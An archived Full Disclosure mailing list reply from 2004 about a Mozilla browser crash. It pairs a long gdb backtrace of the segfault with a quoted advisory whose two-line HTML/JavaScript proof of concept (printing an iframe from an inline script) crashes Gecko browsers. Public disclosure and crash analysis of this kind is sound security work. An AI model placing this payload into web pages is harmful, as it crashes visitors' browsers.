Full Disclosure mailing list archives
Re: [Advisory] Mozilla Products Remote Crash Vulnerability
From: Kevin Finisterre <kf_lists () secnetops com>
Date: Mon, 06 Dec 2004 14:42:36 -0500
(gdb) c Continuing. [New Thread 147461 (LWP 10836)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 16384 (LWP 10810)]0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so
(gdb) bt#0 0x41111a8b in GlobalWindowImpl::MakeScriptDialogTitle () from /usr/lib/mozilla/components/libgklayout.so
#1 0x40a5e665 in XPTC_InvokeByIndex () from /usr/lib/mozilla/libxpcom.so#2 0x412cb905 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so #3 0x412d28a5 in NSGetModule () from /usr/lib/mozilla/components/libxpconnect.so
#4 0x4005fde6 in js_Invoke () from /usr/lib/libmozjs.so #5 0x40069215 in js_Interpret () from /usr/lib/libmozjs.so #6 0x400604ac in js_Execute () from /usr/lib/libmozjs.so#7 0x4003b8b4 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/libmozjs.so #8 0x411068c8 in nsJSContext::EvaluateString () from /usr/lib/mozilla/components/libgklayout.so #9 0x40fa0020 in nsScriptLoader::EvaluateScript () from /usr/lib/mozilla/components/libgklayout.so #10 0x40f9fc2e in nsScriptLoader::ProcessRequest () from /usr/lib/mozilla/components/libgklayout.so #11 0x40f9f7a5 in nsScriptLoader::IsScriptEventHandler () from /usr/lib/mozilla/components/libgklayout.so #12 0x4101c6e7 in nsHTMLScriptElement::MaybeProcessScript () from /usr/lib/mozilla/components/libgklayout.so #13 0x4101bc66 in nsHTMLScriptElement::SetDocument () from /usr/lib/mozilla/components/libgklayout.so #14 0x40f5ac89 in nsGenericElement::AppendChildTo () from /usr/lib/mozilla/components/libgklayout.so #15 0x41045de4 in HTMLContentSink::ProcessSCRIPTTag () from /usr/lib/mozilla/components/libgklayout.so #16 0x410431d0 in HTMLContentSink::Init () from /usr/lib/mozilla/components/libgklayout.so
#17 0x4157318f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #18 0x08a756e8 in ?? () #19 0x08d9bd30 in ?? () #20 0xbffff1a8 in ?? () #21 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #22 0x08c8e9b8 in ?? () #23 0x00000000 in ?? () #24 0xbffff1a8 in ?? () #25 0x41570f8c in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #26 0x08c8e9b8 in ?? () #27 0x08d9bd30 in ?? () #28 0xbffff1d8 in ?? () #29 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #30 0x00000054 in ?? () #31 0x00000000 in ?? () ---Type <return> to continue, or q <return> to quit--- #32 0xbffff1d8 in ?? () #33 0x41572a56 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #34 0x08c8e9b8 in ?? () #35 0x08d9bd30 in ?? () #36 0xbffff1d8 in ?? () #37 0x4156889f in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #38 0x08162600 in ?? () #39 0x00000000 in ?? () #40 0x08c8e9b8 in ?? () #41 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #42 0x00000001 in ?? () #43 0x00000001 in ?? () #44 0xbffff228 in ?? () #45 0x4156f1a5 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #46 0x08c8e9b8 in ?? () #47 0x08d9bd30 in ?? () #48 0x00000054 in ?? () #49 0x00000001 in ?? () #50 0x00000000 in ?? () #51 0x08d9bd30 in ?? () #52 0x08c8e9b8 in ?? () #53 0x4157132e in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #54 0xbffff218 in ?? () #55 0x415b2840 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #56 0x00000001 in ?? () #57 0x00000001 in ?? () #58 0x00000001 in ?? () #59 0x08c8e9b8 in ?? () #60 0x00000001 in ?? () #61 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #62 0x00000000 in ?? () #63 0x00000000 in ?? () ---Type <return> to continue, or q <return> to quit--- #64 0xbffff268 in ?? () #65 0x4156ffcc in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #66 0x08c8e9b8 in ?? () #67 0x08972690 in ?? () #68 0x00000054 in ?? () #69 0x08d9bd30 in ?? () #70 0x08972800 in ?? () #71 0x00000000 in ?? () #72 0x0000000f in ?? () #73 0x00000054 in ?? () #74 0x08d9bd30 in ?? () #75 0x08c8e9b8 in ?? () #76 0x00000001 in ?? () #77 0x415b1f60 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #78 0x00000000 in ?? () #79 0x08972690 in ?? () #80 0xbffff348 in ?? () #81 0x4156e357 in ?? () from /usr/lib/mozilla/components/libhtmlpars.so #82 0x08c8e9b8 in ?? () #83 0x08972690 in ?? () #84 0x00000028 in ?? () #85 0x0805d486 in nsSubstring::Assign () Previous frame inner to this frame (corrupt stack?) -KF Niek van der Maas wrote:
Hi, I'm posting it here, the Mozilla guys didn't want to answer or even confirm this bug. No idea whether this one is exploitable or not, I'll leave that over to the readers of these lists. Bye, Niek van der Maas MaasOnline http://maas-online.nl/ Mozilla Products Remote Crash Vulnerability =========================================== Vendor : The Mozilla Organisation Product(s) : Navigator, Firefox, other Gecko based products Version(s) : All released versions Platform(s) : All platforms (confirmed on Windows, Linux and SunOS) Discovered by : Niek van der Maas, MaasOnline (http://maas-online.nl/) Advisory URL : http://maas-online.nl/security/advisory-mozilla-crash.txt DESCRIPTION While working on one of my projects I discovered a vulnerability in Firefox, allowing a attacker to crash the browser. Further investigation learned that this vulnerability also applies on other Mozilla products, like Navigator. All platforms and versions are affected. The crash occurs when a one-line JavaScript is executed which tries to print an iframe. The crash does not occur when executing this JavaScript in the 'onload' tag or after clicking a link (i.e., 'onclick'). PROOF OF CONCEPT The vulnerability can be exploited with the following 2 lines of code: <iframe id="pocframe" name="pocframe" src="about:blank"></iframe> <script type="text/javascript">window.frames.pocframe.print();</script> A sample page containing these 2 lines is available at http://maas-online.nl/security/poc-mozilla-crash.html PATCH / WORKAROUND No patch is available at this time. The only solution is to disable JavaScript execution at all. VENDOR RESPONSE The bug (#272381) was opened 2004-11-30 in Bugzilla. Until now (2004-12-06), no response or confirmation is received. Contacting the Mozilla Security Team on IRC didn't help either, it seems that they're simply not interested. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Advisory] Mozilla Products Remote Crash Vulnerability Niek van der Maas (Dec 06)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Kevin Finisterre (Dec 06)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Heikki Toivonen (Dec 06)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Juergen Schmidt (Dec 07)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Heikki Toivonen (Dec 07)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Heikki Toivonen (Dec 06)
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Kevin Finisterre (Dec 06)
- <Possible follow-ups>
- Re: [Advisory] Mozilla Products Remote Crash Vulnerability Berend-Jan Wever (Dec 06)
- [Advisory] Mozilla Products Remote Crash Vulnerability PERFECT.MATERIAL (Dec 06)